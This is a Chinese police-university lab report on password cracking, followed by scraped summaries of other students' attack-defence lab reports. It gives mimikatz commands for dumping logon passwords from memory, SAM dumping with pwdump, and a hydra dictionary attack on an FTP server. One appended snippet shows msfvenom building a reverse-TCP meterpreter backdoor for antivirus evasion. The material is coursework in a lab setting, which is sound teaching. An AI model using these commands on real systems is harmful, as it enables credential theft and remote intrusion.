关键词:
中国人民公安大学
Chinese people’ public security university
网络对抗技术
实验报告
|
实验三 |
|
密码破解技术 |
|
学生姓名 |
房斌 |
|
年级 |
2014级 |
|
区队 |
五区 |
|
指导教师 |
高见 |
信息技术与网络安全学院
2016年11月24日
实验任务总纲
2016—2017 学年 第 一 学期
一、实验目的
1.加深并消化本课程授课内容,复习所学过的互联网搜索技巧、方法和技术;
2.了解并熟悉常用加密算法、加解密工具、破解工具等互联网资源,对给定的密文、加密文件、系统密码进行破解;
3.达到巩固课程知识和实际应用的目的。
二、实验要求
1.认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。
2.文档要求结构清晰,图文表达准确,标注规范。推理内容客观、合理、逻辑性强。
3.软件工具可使用john the ripper或hydra、字典生成器、pwdump7等。
4.实验结束后,保留电子文档。
三、实验步骤
1.准备
提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉并准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备。
2.实验环境
描述实验所使用的硬件和软件环境(包括各种软件工具);
开机并启动软件office2003或2007、浏览器、加解密软件。
3.实验过程
1)启动系统和启动工具软件环境。
2)用软件工具实现实验内容。
4.实验报告
按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中,文档按照规定的书写格式书写,表格要有表说图形要有图说。
工具在这里(校内网站访问)
http://121.194.212.168/eol/homepage/course/layout/page/index.jsp?courseId=14280
左侧教学材料,相关工具与样本里
任务(一)
1. 请解密以下字符串35556C826BF3ADDFA2BB0F86E0819A6C。(附截图)
解密之后为ppsuc
2.
这好像是一段歌词,请解密后告诉我歌名。
V2hlbiBJIGFtIGRvd24gYW5kLCBvaCBteSBzb3VsLCBzbyB3ZWFyeTsKV2hlbiB0cm91YmxlcyBjb21lIGFuZCBteSBoZWFydCBidXJkZW5lZCBiZTsKVGhlbiwgSSBhbSBzdGlsbCBhbmQgd2FpdCBoZXJlIGluIHRoZSBzaWxlbmNlLApVbnRpbCB5b3UgY29tZSBhbmQgc2l0IGF3aGlsZSB3aXRoIG1lLgpZb3UgcmFpc2UgbWUgdXAsIHNvIEkgY2FuIHN0YW5kIG9uIG1vdW50YWluczsKWW91IHJhaXNlIG1lIHVwLCB0byB3YWxrIG9uIHN0b3JteSBzZWFzOwpJIGFtIHN0cm9uZywgd2hlbiBJIGFtIG9uIHlvdXIgc2hvdWxkZXJzOwpZb3UgcmFpc2UgbWUgdXDigKYgVG8gbW9yZSB0aGFuIEkgY2FuIGJlLgpZb3UgcmFpc2UgbWUgdXAsIHNvIEkgY2FuIHN0YW5kIG9uIG1vdW50YWluczs=
歌名为《you raise me up》
任务(二)
windows系统密码破解
1.在windows xp系统中使用 net user gao gao123 /add添加用户gao,密码gao123的账户(用户名和密码可以自己设定);并使用net user命令确定用户添加成功。
2.使用pwdump软件导出本机的sam文件
sam文件中的新添加账户及其密码的加密后的字符串
3.使用saminside软件将sam.txt导入,并进行破解,注意配置字典破解和暴力破解
如果遇到复杂密码的LM值破解时间长,可以使用在线破解的方式。
http://www.objectif-securite.ch/ophcrack.php
任务(三)
内存密码提取
在系统中为Administrator用户设置一个高强度密码。
使用minikatz工具对系统的密码进行提取,涉及两条命令
第一条:privilege::debug //提升权限 第二条:sekurlsa::logonpasswords //抓取密码
任务(四)
远程服务密码破解
两个同学配合完成,A同学搭建FTP服务器,并新建用户,并设置登陆密码
在ip地址为192.168.42.29的主机上搭建了FTP服务器,账号为gao 密码为123
2.B同学使用hydra 对ftp用户的密码进行字典破解。hydra 中有关于该软件的使用命令语法。字典文件需要自己去生成。
先生成字典文件passlist.txt
成功获得192.168.42.29的ftp服务器上用户名为gao的密码为123
任务(五)
应用程序密码破解
使用Rar crack软件破解,给出的RAR target文件的密码,并查看压缩包中的内容
破解软件和RAR target均在前面给出的链接里。
20155220网络攻防技术实验三免杀原理与实践(代码片段)
网络攻防技术实验三免杀原理与实践使用msf生成后门程序的检测首先我们对上次实验生成的后门exe,利用VirSCAN进行检测然后我们利用msfvenom-pjava/meterpreter/reverse_tcplhost=192.168.150.138(kaliip)lport=5220x>5220_backjar.jar,生成jar文件,... 查看详情
信息安全技术实验五网络攻防技术20155202张旭
信息安全技术实验五网络攻防技术20155202练习一信息收集一、实验目的该实验为验证性实验。?了解信息搜集的一般步骤?学会熟练使用ping命令?学会利用Nmap等工具进行信息搜集二、实验内容Ping探测Nmap扫描探测总结注:详细实验操... 查看详情
网络攻防_实验四
网络攻防实验一
一、安装windowsdir列文件名 二、Linux操作系统命令 查看详情
网络攻防_实验八
网络攻防_实验五
网络攻防_实验六
201993052019-2020-2《网络攻防实践》综合大实践
TheArtofTheScam:DemystifyingHoneypotsinEthereumSmartContracts一、前言二、知识梳理三、实验四、问题与解决五、总结与建议六、参考资料 查看详情
网络攻防实验二
网络对抗技术实验报告 实验二网络嗅探与欺骗 学生姓名严威 年级 2015区队 六指导教师 高见 2017—2018学年 第 一 学期一、实验目的1.加深并消化本课程授课内容,复习所... 查看详情
网络攻防第一次实验(201421450010)
...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描 学生姓名陈书扬 年级 2014级区队 5区指导教师 高见 信息技术与网络安全学院2017... 查看详情
网络攻防对抗技术实验报告二
...民公安大学 Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验二网络嗅探与欺骗 学生姓名李飞扬年级2014级 区队2 指导教师高见 信息技术与网络安全学院 实验任务总纲2016—20... 查看详情
网络技术与攻防实验一
...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验一网络侦查与网络扫描 学生姓名魏成豪年级 2014级区队 6指导教师 高见信息技术与网络安全学院2017年7月7日实验任务... 查看详情
2017-2018-220179226《网络攻防》第8周作业
实验一网络攻防环境的搭建与测试一、各台虚拟机配置情况1.靶机Windows:2.靶机Linux:3.攻击机Windows:4.攻击机Linux:二、各台主机的ip情况:三、主机之间互ping情况: 查看详情
20155235《网络攻防》实验七网络欺诈防范(代码片段)
20155235《网络攻防》实验七网络欺诈防范实验内容本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。具体实践有:简单应用SET工具建立冒名网站ettercapDNSspoof结合应用两种技术,用DNSspoof引导特... 查看详情
网络攻防实验一
姓名:姚灿学号:201521440013指导教师:高见 实验日期:2018年9月9日 2、windows基本命令Dir显示目录 cd进入目录 Arp-a-d-sarp缓存 Netshare 查看计算机共享资源 查看详情
#20155235《网络攻防》实验二后门原理与实践(代码片段)
20155235《网络攻防》实验二后门原理与实践实验目的建立一个后门连接是如此的简单,功能又如此强大。通过亲手实践并了解这一事实,从而提高自己的安全意识。实验内容(1)使用netcat获取主机操作Shell,cron启动(2)使用socat获取... 查看详情
网络攻防第四次实验(第一部分)
...国人民公安大学Chinesepeople’ publicsecurityuniversity 网络对抗技术实验报告 实验四恶意代码技术 学生姓名 陈书扬年级 201421450010区队5区 指导教师高见 信息技术与网络安全学院2016年11... 查看详情
20155328网络攻防实验五:msf基础应用(代码片段)
20155328网络攻防实验五:MSF基础应用实践内容及过程记录一、Windows服务渗透攻击————ms08_067攻击机:kali靶机:WindowsXP(英文版)第一步,分别查看攻击机和靶机的IP。在kali终端中,输入msfconsole进入msf控制台,依次输入以下... 查看详情